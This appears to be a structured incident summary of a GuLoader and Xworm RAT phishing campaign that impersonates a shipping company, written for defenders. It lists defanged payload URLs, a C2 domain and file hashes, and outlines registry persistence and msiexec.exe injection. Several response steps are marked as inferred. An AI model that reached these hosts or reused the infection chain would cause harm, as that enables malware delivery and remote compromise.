Full Report
AhnLab SEcurity intelligence Center (ASEC) recently identified the distribution of GuLoader malware via a phishing email by impersonating a famous international shipping company. The phishing email was obtained through the email honeypot operated by ASEC. The mail body instructs users to check their post-paid customs tax and demands them to open the attachment. Figure […]
Analysis Summary
# Incident Report: GuLoader & Xworm RAT Campaign via Shipping Impersonation
## Executive Summary
This incident involved a targeted phishing campaign impersonating an international shipping company to distribute GuLoader, which subsequently downloaded and executed the Xworm Remote Access Trojan (RAT). The attack leveraged obfuscated VBScript and PowerShell to achieve initial execution and persistence, leading to the remote compromise of victim systems. Response primarily focused on identifying the malware chain and cataloging indicators of compromise related to the final payload.
## Incident Details
- **Discovery Date:** Recently identified (by ASEC via honeypot)
- **Incident Date:** Not explicitly stated, occurred shortly before ASEC identification.
- **Affected Organization:** Not disclosed (identified via ASEC's honeypot)
- **Sector:** General (Leveraging themes applicable across sectors)
- **Geography:** Not disclosed
## Timeline of Events
### Initial Access
- **Date/Time:** Unknown
- **Vector:** Phishing email impersonating a famous international shipping company, demanding users check post-paid customs tax.
- **Details:** The email contained an attachment designed to trick the user into execution.
### Lateral Movement
- **Details:** Attackers used the executed PowerShell script to download additional files, and established persistence via a registry key. The final payload, Xworm RAT, suggests remote control capabilities, implying potential for further internal network movement was present immediately upon RAT execution.
### Data Exfiltration/Impact
- **Details:** The final executed payload was Xworm RAT, indicating the primary impact mechanism is the establishment of remote administration, enabling subsequent data theft, espionage, or system destruction, although specific data loss was not detailed in the summary.
### Detection & Response
- **How it was discovered:** Detected by the AhnLab Security intelligence Center (ASEC) email honeypot.
- **Response actions taken:** Identification and analysis of the malware chain (VBScript $\rightarrow$ PowerShell $\rightarrow$ GuLoader $\rightarrow$ Xworm RAT) and cataloging of IOCs.
## Attack Methodology
- **Initial Access:** Phishing email with malicious attachment masquerading as a shipping notification regarding customs tax.
- **Persistence:** Creation of a registry key under `HKEY_CURRENT_USER\SOFTWARE\[Random Name]` (e.g., `PolySyndetic`) to ensure execution of the obfuscated PowerShell script upon system restart or user logon.
- **Privilege Escalation:** Not explicitly detailed, but the method relies on user execution of the attachment.
- **Defense Evasion:** Heavy obfuscation used within the VBScript controlling the execution of the PowerShell script.
- **Credential Access:** Not explicitly detailed in the initial stages, but expected behavior after Xworm RAT execution.
- **Discovery:** Not explicitly detailed, but standard for RAT operations.
- **Lateral Movement:** Not explicitly detailed, but Xworm RAT is capable of this.
- **Collection:** Likely performed post-Xworm RAT execution.
- **Exfiltration:** Likely performed post-Xworm RAT execution.
- **Impact:** Execution of Xworm RAT via process injection into `msiexec.exe`.
## Impact Assessment
- **Financial:** Not stated.
- **Data Breach:** Potential for significant data breach due to the deployment of a Remote Access Trojan (Xworm RAT).
- **Operational:** Potential for operational disruption due to system compromise and remote control by threat actors.
- **Reputational:** Potential reputational damage dependent on the targeted entities.
## Indicators of Compromise
- **Network indicators (Defanged):**
- `hxxps[:]//planachiever[.]au/admin-admin/Belejrers[.]fla`
- `hxxps[:]//planachiever[.]au/admin-admin/bPeMVYr142[.]bin`
- `tripplebanks[.]duckdns[.]org` (FQDN)
- **File indicators:**
- MD5: `0477406f83847d43a3b668cc1e75185f`
- MD5: `1ce8509eabe2a293376d9b70044922fd`
- MD5: `9c14df330dea5dfaab7a4303a3296779`
- MD5: `a501b4c09476b8f5ab505c6578bf9f9e`
- **Behavioral indicators:**
- VBScript launching obfuscated PowerShell.
- PowerShell script downloading secondary payloads.
- Registry key creation under `HKEY_CURRENT_USER\SOFTWARE\[Random Name]` for persistence.
- Process injection and execution of Xworm RAT via child process `msiexec.exe`.
## Response Actions
- **Containment measures:** (Inferred based on standard practice following detection): Identification of all files/processes associated with the GuLoader/Xworm chain on affected hosts.
- **Eradication steps:** (Inferred): Removal of suspicious registry keys, deletion of malicious files, termination of malicious processes.
- **Recovery actions:** (Inferred): Rebuilding or restoring systems if deeply compromised, password resets for potentially harvested credentials.
## Lessons Learned
- **Key takeaways:** Multi-stage attacks relying on social engineering (phishing) remain highly effective, especially when embedded within seemingly legitimate business context (shipping/customs). The use of heavily obfuscated scripts (VBScript/PowerShell) effectively bypasses initial signature-based detection.
- **What could have been done better:** Better endpoint detection and response (EDR) capabilities required to detect in-memory execution by GuLoader and subsequent process injection into legitimate processes like `msiexec.exe`.
## Recommendations
- Implement stricter controls on running PowerShell and VBScript from untrusted email attachments (e.g., application control whitelisting).
- Enhance email gateway scanning for highly obfuscated scripts and files commonly associated with popular downloaders like GuLoader.
- Regularly audit `HKCU\Software` keys for unexpected auto-run entries established by user-level processes.
- Train users to verify external shipping or customs claims through official channels rather than relying solely on unsolicited email links or attachments.